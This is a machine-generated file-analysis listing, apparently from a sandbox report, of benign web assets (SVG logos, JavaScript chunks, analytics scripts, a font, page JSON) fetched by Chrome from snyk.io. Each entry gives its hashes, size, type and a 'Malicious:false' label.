                                                                                                                                                                                                                                                                                                              SHA1:EF74C534DAB9E15D0647E964E95317EBF617FC8B
                                                                                                                                                                                                                                                                                                              SHA-256:542970E00E0FC3AC72193FA973BB55E84807C01058EF8FF16E16ED51572A17A7
                                                                                                                                                                                                                                                                                                              SHA-512:1F4BC72E27A914C4CB1568F187AA495161C5C543242917053AC44176B607E70E097F3B47F0FCD5E178B13AAAFCFB035A16ACD9AE3CC0E4161262D5245CE52672
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1729618965/default-report.b205b2e0.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="1200" height="630" viewBox="0 0 1200 630" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.<g clip-path="url(#clip0_8631_30224)">.<rect width="1200" height="630" fill="url(#paint0_linear_8631_30224)"/>.<g clip-path="url(#clip1_8631_30224)">.<rect width="1230.48" height="646" transform="translate(-15.2381 -8)" fill="white"/>.<g clip-path="url(#clip2_8631_30224)">.<rect width="1230.48" height="643.949" transform="translate(-15.4762 -6.97461)" fill="white"/>.<rect x="-15.4762" y="636.975" width="643.949" height="1230.48" transform="rotate(-90 -15.4762 636.975)" fill="#030328"/>.<g style="mix-blend-mode:color-dodge" filter="url(#filter0_f_8631_30224)">.<path d="M154.356 774.965C28.4077 646.934 202.931 472.103 296.813 434.968C592.265 319.046 1073.81 469.146 1084.86 705.508C1095.9 941.869 284.438 907.199 154.356 774.965Z" fill="#E555AC"/>.</g>.<g opacity="0.5">.<g style="mix-blend-mode:overlay">.<rect x="1215" y="636.975" width="1230.48"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (64015), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):64015
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.209365259762595
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:sprVgXJF9bKTcCkTETu+TzPuTmTOT7T4TeTqTXTBTPhmkTBmkTFTrDTlTcT0TQ18:bb2UEhDymTSvwCWjJPlFVrn1MUQJI
                                                                                                                                                                                                                                                                                                              MD5:EAAA8F5B073BB1B854180A7BC6B205D3
                                                                                                                                                                                                                                                                                                              SHA1:A6F5D896202AE511E36B36E5EED16BA2AD5A3E19
                                                                                                                                                                                                                                                                                                              SHA-256:69597A264360B7092D18CC5BC07725665200250012B595810D71FE8F83ED89E5
                                                                                                                                                                                                                                                                                                              SHA-512:5E3E1436EF6008ED7DA0AF19C07ADFC141B87B64607BCB2B9BF4886F71CB7DEA15A0A47DCD68811A307833212013094E90B0840C0E0DCF85078BB81AFB109144
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9371],{74129:function(e,t,n){var i,r,o,a,d,s,p,l,y,f,c,u,E,m,T,L=n(67294),S=function(){return(S=Object.assign||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};"function"==typeof SuppressedError&&SuppressedError;var b="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:void 0!==n.g?n.g:"undefined"!=typeof self?self:{},I={},O={};Object.defineProperty(O,"__esModule",{value:!0}),O.BLOCKS=void 0,(i=c||(O.BLOCKS=c={})).DOCUMENT="document",i.PARAGRAPH="paragraph",i.HEADING_1="heading-1",i.HEADING_2="heading-2",i.HEADING_3="heading-3",i.HEADING_4="heading-4",i.HEADING_5="heading-5",i.HEADING_6="heading-6",i.OL_LIST="ordered-list",i.UL_LIST="unordered-list",i.LIST_ITEM="list-item",i.HR="hr",i.QUOTE="blockquote",i.EMBEDDED_ENTRY="embedded-entry-block",i.EMBEDDED_ASSET="embedded-asset
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (23897), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):23897
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.309124558333512
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:qiH5aLGGy474znD9oSZXH79WfhaONcgnCXg9:XuGGhaXXY5TcgnCXg9
                                                                                                                                                                                                                                                                                                              MD5:CD29B9BC973E48A7FCD0EE7153BDF03B
                                                                                                                                                                                                                                                                                                              SHA1:AC3E5CF1C0D4183B2DF14C34BEBB84B3EE657799
                                                                                                                                                                                                                                                                                                              SHA-256:7CB58278C8F54A62C0AFA6DA0C67B3A45AAD637A0BF614E9C0DD42B73CEE266B
                                                                                                                                                                                                                                                                                                              SHA-512:253356199738322AE0D761A162136D91BA00018B180FF54C4D014C0B8AE4A93F5DD4D21664E8C582A4DB73F0F4265D34604D2B4C03CEF02A67882815ED328C2D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/52.b1edaf4a.chunk.js
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[52],{jrvE:function(e,t,n){"use strict";var r=n("nfbA"),a=n("cgfC"),i=n("a4gb"),o=n("+nxv"),c=n("usiZ"),s=n("nb4r"),u=n("2nP+"),l=n("AHQf"),d=n("jiYP"),p=n("zgdO"),f=n("bTzN"),v=n("jniC"),_=n("uIJS"),h=n("wQh9"),b=n("yvDu"),m=n("LvsC"),O=n("qytN"),g=n("7jL2"),y=n("LfGp"),j=n("uHEx"),E=n("Iwrg"),k=n("+OSO"),S=n("MiOA"),x=n("8dVd"),w=n("26VM"),T=n("mekd"),R=n("3QMb");function exceptionFromError(e,t){var n=parseStackFrames(e,t),r={type:t&&t.name,value:extractMessage(t)};return n.length&&(r.stacktrace={frames:n}),void 0===r.type&&""===r.value&&(r.value="Unrecoverable error caught"),r}function eventFromError(e,t){return{exception:{values:[exceptionFromError(e,t)]}}}function parseStackFrames(e,t){var n=t.stacktrace||t.stack||"",r=function getPopSize(e){if(e){if("number"===typeof e.framesToPop)return e.framesToPop;if(F.test(e.message))return 1}return 0}(t);try{return e(n,r)}catch(a){}return[]}var F=/Minified React error #\d+;/i;function extr
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2354), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):2354
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.153215417418502
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:dhiaqD+ILRN1lCuPBzW/HDZPeRFVF1fdflKrp1yt1Jk9pNK/N569iohNf:qai+ILRN1ldzW/HZ4H1fdNKQ6a5VohB
                                                                                                                                                                                                                                                                                                              MD5:FCF06E135949A699D8950FEC18D1A14A
                                                                                                                                                                                                                                                                                                              SHA1:2B14C23101460DCE9D60F1C4319B6999EEB3A238
                                                                                                                                                                                                                                                                                                              SHA-256:52C33E15C3D7E4924C94171C8917A0239551234F0D3B602D5F4C55A244D839EA
                                                                                                                                                                                                                                                                                                              SHA-512:AFC80090D5ABD31EA69A33B78F8C145D127902C5962C3DCB76105611C6C1A4754A8EFED2275CD811DFE718B820640D46DC0FEFD69B5224F86DF7906376014406
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_vercel/insights/script.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(()=>{function e(e){let t=location.href;if(e){let n=new URL(t);if(n.pathname!==e)return n.pathname=e,n.search="",n.href}return t}var t,n,a,r,i=(a=()=>{},()=>(a&&(r=a(a=0)),r));(t=()=>{i(),function(){let t=e=>e,n=document,a=n.currentScript,r=(null==a?void 0:a.dataset.endpoint)||(null!=a&&a.src.includes("/va/")?"/va":"/_vercel/insights"),i=null==a?void 0:a.dataset.disableAutoTrack,o=null,l=null,s=!0;async function u(e){if(e&&!Array.isArray(e))return{p:e};let t=n.querySelectorAll("[data-flag-values]");if(!a||!t.length)return;let r=new URL(a.src);return r.pathname=r.pathname.replace("/script.js","/flags/script.js"),import(r.href).then(n=>n.gather(t,e))}async function c({type:i,data:s,options:c}){var d,f;let h=e(l),p=n.referrer,v=t({type:i,url:h});if(!1===v||null===v)return;v&&(h=v.url);let w=p.includes(location.host),y={o:h,sv:"0.1.2",sdkn:null!=(d=null==a?void 0:a.dataset.sdkn)?d:void 0,sdkv:null!=(f=null==a?void 0:a.dataset.sdkv)?f:void 0,ts:Date.now(),...o&&{dp:o},...null!=
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (59872), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):59882
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.096376433523086
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:3B/x6m8DRZEgZQTZvMAORbNAG+EMVvpxl+fm9re9PE8waMe:xp58RZlZWZvTcbNAGmXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:96D8CE9F8955B15EE1E66AE6A018EB0A
                                                                                                                                                                                                                                                                                                              SHA1:2A67DB4853833E9C5AADB82DFB6C622C74BAB0BD
                                                                                                                                                                                                                                                                                                              SHA-256:E5705AB707C8361811EC467244D36107F3241582B7D04751AFA216BC042B2BF3
                                                                                                                                                                                                                                                                                                              SHA-512:042289480494371D571768686CCE7977D65AB023EF2C4517FF3F346CE47BE9D9D6FBAF3649713273DD3CC4B930A3D2EBFB75B876E71A3D39B3DAEE383B40AE1E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3YZHUBWaQe7IIXup715Qtn","type":"Entry","createdAt":"2023-01-17T19:25:50.560Z","updatedAt":"2024-03-12T14:49:26.767Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":40,"revision":9,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Support and Services | Snyk","title":"Support and Services | Snyk","uri":"services","pageLocalization":["fr","ja","pt-BR","de"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"i1zfp4h9xEveHp608m5IX","type":"Entry","createdAt":"2023-01-17T19:25:50.690Z","updatedAt":"2024-03-12T14:49:26.861Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":17,"revision":6,"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (59718)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):137250
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.288387434318956
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:5mC+q+851078or/lwI/IcSJl+hzJZCURTHOXNmJTb3ZxD6tZzV6SFWXgmRyzbU7+:57ogmF5b1fa6nz6Yz6P0GcoTxshc
                                                                                                                                                                                                                                                                                                              MD5:21413C866637601925A1BF99328491E9
                                                                                                                                                                                                                                                                                                              SHA1:A99A7B002662B4FD5669FB2B8BD5E30E0C1992A0
                                                                                                                                                                                                                                                                                                              SHA-256:8CF278D18950B5C4041F330489E2B9C1A8613EA717AE1AC5F0B0B0741FA2D287
                                                                                                                                                                                                                                                                                                              SHA-512:D33E859EBE0E0A2D67E283E2E6A46D6D4E2FC8B4E1CCAD3BAF04774733D7896A742772E280A1EE483CFE0F3BA731880D4505C861E7597A9D9A6A26F0AB5E91BF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/
                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>Developer security | Snyk</title><meta name="robots" content="index,follow,max-image-preview:large"/><meta name="description" content="Enable developers to build securely from the start while giving security teams complete visibility and comprehensive controls."/><link rel="alternate" hrefLang="x-default" href="https://snyk.io/"/><link rel="alternate" hrefLang="en" href="https://snyk.io/"/><link rel="alternate" hrefLang="de" href="https://snyk.io/de/"/><link rel="alternate" hrefLang="fr" href="https://snyk.io/fr/"/><link rel="alternate" hrefLang="ja" href="https://snyk.io/jp/"/><link rel="alternate" hrefLang="pt-BR" href="https://snyk.io/pt-BR/"/><meta name="twitter:card" content="summary_large_image"/><meta property="og:title" content="Developer security | Snyk"/><meta property="og:description" content="Enable developers to build securely from the start while givin
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 8000, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):8000
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.97130996744173
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:GDonmfrEdXT8WrxzRXwyQo3zGEOM7Y2hOMgWnsfYSjv4ENFGwrlKJ:8onPxTzjgyQSzLPXOTIYHJAJ
                                                                                                                                                                                                                                                                                                              MD5:72993DDDF88A63E8F226656F7DE88E57
                                                                                                                                                                                                                                                                                                              SHA1:179F97EC0275F09603A8DB94D4380EB584D81CD5
                                                                                                                                                                                                                                                                                                              SHA-256:F4E80D9DFD374D02989B87A27B5ED4CB78FBB177C27F1478E9A8B0AFB7513149
                                                                                                                                                                                                                                                                                                              SHA-512:7C20165F9D22A86341E841FD58526209017DCDE2AFE2D0D2A89FE853D95DC69F658D25CF798C71F452DAB09843FC808C1AE87A60B1284134163ABF5A1D93E50A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2
                                                                                                                                                                                                                                                                                                              Preview:wOF2.......@......?@.................................`..T..t.*..6..6.$..h. ..T.....1E.r.8...KD....*..2.>L.......0..c.h...y_)s...N..(._C,/.v...7B...Z..gT@....u*.\t.9....{.&.;<...j.2.H-...A.S......E..)..f.Y8vuw^.^_.n{.Z..U.h..Kcm.........E..........'.J.-.-.......=.."...E...../R.8P....>?.]...R..Ag:.Pt..j..s..pG. .!f?.Q.T.".O.....D.r......3>gJN!V.\.!....+.......X.B.v....c9.&iW-[.,.. ...Q.k%I.s.%...d...8q..._~.C.n".v0..6B.eT..?..7.....l....3..7...M...5......k......^.....F.v~|.....3N=.....[.!......}....F(...fA..c)0X$,FYL..=).(h<4...M5..<3.c....K/.{.p....3+'W...Z.[..;.w.....X....nx..v.(c;._.W......|.b.....{...9..A6...V|.N...Z?+|H/.#.W%.._.8,...>._..w...RP..-.?.k7X..".._S.3,J.........&.8Gs.?yH.Yx......I_....._o.0K......(e.Q.W....=...J.7.\k.n.pd.....s..%...sD......_..&-...(.7..6.U..&<~8...9......uV..|h.#m\.d./!....s.......b.j. ."...wX...B.`..Bj=......VnM....p..k.%..U.F..-VN).Y........_..W.p...B..|.j..f..7....).~....n......c.3....t.......s..>...
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.950379705524843
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:Y9KJLqUMimOuIii/uYxbQ60tV/4edJFxJCYHJdt7IyJBp/cLYJHr5EYnYpJLT6:YwLuBaWYxbQxpFxJTHJx2YLyJr6
                                                                                                                                                                                                                                                                                                              MD5:4FA644AAEB750C31EAA6B786B8476B1A
                                                                                                                                                                                                                                                                                                              SHA1:1EA03F342F297DBEA950C2851AA98D51260B1034
                                                                                                                                                                                                                                                                                                              SHA-256:325A681244162E8594C3799042FFA1604224637FCB4AF847E84CD7B549FB0496
                                                                                                                                                                                                                                                                                                              SHA-512:BF7759CC95B970DFFE1780494FEE131FA5CEFEA5439AA83B54B88C43E542EB6D7B60DABEDF47A7174C9C6896DD7D307354374BB517DAA8516840373402F1C85E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"description":"Rules for all countries, separating CCPA for all and GDPR for EU only","rules":[{"settingsId":"HJ-Jgu0__ikv-k","name":"GDPR - (EU / UK only)","locations":["AT","BE","BG","HR","CY","CZ","DK","EE","FI","FR","DE","GR","HU","IE","IT","LV","LT","LU","MT","NL","PL","PT","RO","SI","SK","ES","SE","GB"]}],"defaultRule":{"settingsId":"Zz23KCbJ4","noShow":false}}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):105589
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.174579671892662
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:MLMeCBCBkyC/MFRo43esRdLyWQL9XJYOLBOiDYdveR2CjRBKF2FTm7L/PTDFlIs4:0CBNR/E1D82vnCjRBKFgTmbRFnOoh2
                                                                                                                                                                                                                                                                                                              MD5:C041A31B4F3AFDBD4F597D68FBC4DE22
                                                                                                                                                                                                                                                                                                              SHA1:23AE116FB22FB17623D6D42C525EB256A423BB5A
                                                                                                                                                                                                                                                                                                              SHA-256:CB5842B2430D3BA471D14A1B010A508D2CDACBCCD007797F34021B651D22FB53
                                                                                                                                                                                                                                                                                                              SHA-512:C9049ED8B4FE6F1BD3FF3B01F213D22075992CD0F2B6D0461A618C33F2B96F0FB3E0153B7B0C48F6F6F7BBF79F8195F89A6283FB9546A82A6021A9BBE1236C1B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://cdn.segment.com/analytics.js/v1/UspolAZH46ZIH3mN3bdf7rx63q24gitb/analytics.min.js
                                                                                                                                                                                                                                                                                                              Preview:!function(){var t,e,n,r,i={8878:function(t,e,n){"use strict";var r=this&&this.__importDefault||function(t){return t&&t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0});var i=r(n(325));function o(t,e){return function(){var n=this.traits(),r=this.properties?this.properties():{};return i.default(n,"address."+t)||i.default(n,t)||(e?i.default(n,"address."+e):null)||(e?i.default(n,e):null)||i.default(r,"address."+t)||i.default(r,t)||(e?i.default(r,"address."+e):null)||(e?i.default(r,e):null)}}e.default=function(t){t.zip=o("postalCode","zip"),t.country=o("country"),t.street=o("street"),t.state=o("state"),t.city=o("city"),t.region=o("region")}},4780:function(t,e,n){"use strict";var r=this&&this.__importDefault||function(t){return t&&t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0}),e.Alias=void 0;var i=r(n(1285)),o=n(9512);function s(t,e){o.Facade.call(this,t,e)}e.Alias=s,i.default(s,o.Facade),s.prototype.action=function(){return"alias"},s.p
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4851), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4851
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.428670760452963
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:nz+dTbudjEdUBRRjOjRwqiXICG7NO92pUWpxlHLIZ4:SlSxjOyqiYrNOXCrIZ4
                                                                                                                                                                                                                                                                                                              MD5:FFE5DE25445830E533B0F09CE0CC9E25
                                                                                                                                                                                                                                                                                                              SHA1:EF741C976A767D91783B21F4DBD72A052D9C80A6
                                                                                                                                                                                                                                                                                                              SHA-256:CEF3803F45535D14C06E7404F7F307003D11884E3F60FCB58C06616DCE6EFCDF
                                                                                                                                                                                                                                                                                                              SHA-512:86567B8E0C7632DD39D3B44564FFB24C75EC45B0FDF8AF4256B9048D44B7646706E7B3AE8DE6A9F60B2DFEBA84E04C01F5632C00709E943D61275780B720B981
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/6923.fd4c79cfe6f39e9e.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6923],{96923:function(e,o,r){r.r(o),r.d(o,{default:function(){return v}});var t=r(85893),n=r(4298),s=r.n(n),l=r(67294),a=r(45697),i=r.n(a),d=function(e){let{isInlined:o}=e;return(0,t.jsx)("div",{className:"w-full max-w-full border-box d-flex flex-col gap-medium bg-white",children:Array(o?1:5).fill().map((e,o)=>(0,t.jsx)("div",{className:"h-extra-large w-full bg-skeleton radius-medium"},o))})},m=r(44133),c=r(93441),u=r(62792),f=r(9981),p=r(23751);function g(e){var o;let r={1:"Unsubscribe",1004:"Event",1015:"Book a demo",1023:"Subscription management",1034:"Asset download",1047:"Contact us",1051:"Newsletter",1055:"Other",1058:"Other",1059:"Book a demo",1125:"Event",1177:"Contact us",1180:"Event",1198:"Event",1203:"Other",1284:"Subscription management",1338:"Book a demo",1461:"Other",1627:"Other",1628:"Event",1629:"Contact us",1630:"Newsletter",1631:"Newsletter",1632:"Contact us",1633:"Event",1634:"Other",1635:"Subscrip
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4969
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9877315552362615
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:/koIanLXP6CcjaG3F/YfLsGU6A3PG4V1wmEbVbL40oBk:/knaG6YGU6w+CwdpL4K
                                                                                                                                                                                                                                                                                                              MD5:AD62472EB6F310DEDA5037C2EE5210FD
                                                                                                                                                                                                                                                                                                              SHA1:9B5BF33766C3BAA46F4DEF67147B6234565A3D1E
                                                                                                                                                                                                                                                                                                              SHA-256:37BE50A4275F91AEF2E3E3B5036CFEF42296BF9A6594576E4016793A5AE17887
                                                                                                                                                                                                                                                                                                              SHA-512:C8C00BE32F7F924F889E301C82ABBF043B5578F97186ADC4B5F7C9998AF01EA2F90D12E04ACFD9A225EBEB1C24EA340C88ED0DAA58D94F3776F6F1E87A23FDFA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>. Created with Inkscape (http://www.inkscape.org/) -->..<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd". xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape". width="58". height="58". viewBox="0 0 15.345833 15.345833". version="1.1". id="svg3304". inkscape:version="0.92.0 r15299". sodipodi:docname="ice.svg">. <defs. id="defs3298">. <clipPath. id="clipPath672". clipPathUnits="userSpaceOnUse">. <path. inkscape:connector-curvature="0". id="path670". d="M 0,0 H 612 V 792 H 0 Z" />. </clipPath>. </defs>. <sodipodi:namedview. id="base". pagecolor="#ffffff". bordercolor="#666666". borderop
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3851
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9742575533521984
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:krRL+ENiydxXOF4SQTWC+dHMdC7zpQXbarxSg5N0iuHRCjWFTf+oikOciY1eqqag:k9SHX4SQCxHMlea0Kf+hciYgqqaHymf0
                                                                                                                                                                                                                                                                                                              MD5:9B110B20354045BEE9AD8AAC5D4A43AA
                                                                                                                                                                                                                                                                                                              SHA1:878083352928F2CAFB749EB57C5B004881C9E169
                                                                                                                                                                                                                                                                                                              SHA-256:C558EB0A73E0B32DA311FFEAB73198FBFFBD80DE0573908B6BB2406C097923E8
                                                                                                                                                                                                                                                                                                              SHA-512:5AB74354B417EDCBCC32AAE420543B24DBB511303D29F0A29A23083B1DDC06CEE59C1CB23A19ACEF9FA963A03E3D2699428F93AA38F6E2166CA22FC639A4FC62
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1672705017/customer-logos/CVS_Health_logo_1.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="362" height="48" viewBox="0 0 362 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M305.24 45.8414C306.041 45.8414 307.296 45.6717 307.922 45.4421V41.5595C307.124 41.7291 306.44 41.7865 305.811 41.7865C303.755 41.7865 302.784 40.7036 302.784 37.5046V2.61577H293.991V6.50091H297.989V37.7317C297.989 43.0442 300.102 45.8414 305.24 45.8414ZM317.117 37.7916V19.7458H323.111V15.8632H317.117V8.32744H312.321V15.8632H307.753V19.7458H312.321V38.0187C312.321 43.2712 314.662 45.8414 320.202 45.8414C321.057 45.8414 322.427 45.6717 323.111 45.4421V41.5595C322.198 41.7291 321.399 41.7865 320.658 41.7865C318.258 41.7865 317.117 40.9307 317.117 37.7916ZM239.804 19.0047C246.084 19.0047 249.338 23.4588 249.852 28.4269H229.241C229.813 23.0021 233.466 19.0047 239.804 19.0047ZM263.042 30.6526C263.042 23.9154 267.327 19.0621 273.378 19.0621C279.489 19.0621 283.656 24.0277 283.656 30.6526C283.656 37.2751 279.489 42.2457 273.378 42.2457C267.327 42.2457 263.042 37.3899 263.042 30.6526ZM338
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (24671), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):24677
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3138344246237885
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:L1ljb7tk3jKT93fVxiaCaNk/sOXQDy1WV8XNn72j8I9Ly2bqxKHNOhe5:L1ZJsrG9MQj5
                                                                                                                                                                                                                                                                                                              MD5:3ED1ACB02510BD2361181841D4E25001
                                                                                                                                                                                                                                                                                                              SHA1:7229555C8E007AE429B12D93C47557CEB230FD86
                                                                                                                                                                                                                                                                                                              SHA-256:53A199EA5F704C5E5634830014A5FD6AC4B29178CD79604F84CC4C2340FC4CCF
                                                                                                                                                                                                                                                                                                              SHA-512:CC5F1CBA3B677A91C06F790460AF4B26AC0B3FAB13AAA3414C616652317E5B150481D6AE7A30D531CD5BAF649D536E9A09BE76BF3401FBFBB9D87D2843DFF4E9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
